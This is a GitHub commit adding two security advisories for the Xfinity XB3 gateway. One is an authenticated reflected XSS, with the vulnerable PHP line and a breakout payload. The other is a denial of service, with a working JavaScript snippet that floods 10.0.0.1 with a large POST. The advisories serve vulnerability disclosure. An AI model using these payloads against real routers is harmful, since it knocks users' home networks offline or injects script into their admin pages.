-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
34 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # Xfinity Gateway XB3 - Authenticated Reflected XSS | ||
| The administrative interface of Xfinity Gateway model XB3 (and possibly others) will execute arbitrary JavaScript if sent a specially crafted POST request by an a logged in administrator. | ||
|
|
||
| ## Details | ||
| The `/wizard_step2.php` page takes a POST parameter `userPassword` and unsafely echoes it to JavaScript on the page: | ||
|
|
||
| var newPassword = '<?php if("admin" == $_SESSION["loginuser"]) echo $_POST["userPassword"]; ?>'; | ||
|
|
||
| Arbitrary JavaScript can be executed if the following payload is sent in the `userPassword` POST parameter: | ||
|
|
||
| ';}alert(1);function foo() {var foo = ' | ||
|
|
||
| ## Mitigating Factors | ||
| Users can be logged into the XB3 gateway by any website if the device is using default credentials. However, the POST request exploiting this vulnerability requires a valid CSRF protection token, so this vulnerability is not exploitable by malicious websites without an accompanying CSRF protection token leak. | ||
|
|
||
| ## Impact | ||
| 5.3 - Medium (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:H/A:L) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # Xfinity Gateway XB3 - DoS Via Large POST Request | ||
| The administrative interface of Xfinity Gateway model XB3 (and possibly others) does not enforce a max POST request size. Any website is able to send a large POST request to the gateway at `10.0.0.1`. If the request size is large enough, the device will stop responding and reboot, leading to a Denial of Service condition due to memory exhaustion. | ||
|
|
||
| ## Proof of Concept | ||
| The following JavaScript will crash an XB3 gateway if a website visitor stays on the page long enough: | ||
|
|
||
| (() => { | ||
| const xhr = new XMLHttpRequest(); | ||
| xhr.open('POST', 'http://10.0.0.1'); | ||
| xhr.send('A'.repeat(99999999)); | ||
| })(); | ||
|
|
||
| ## Mitigating Factors | ||
| During testing it took an average of 80 seconds to post enough data to cause this crash, so a website exploiting this bug would need to convince the user to wait around long enough to finish posting the payload. | ||
|
|
||
| ## Impact | ||
| 6.5 - Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) |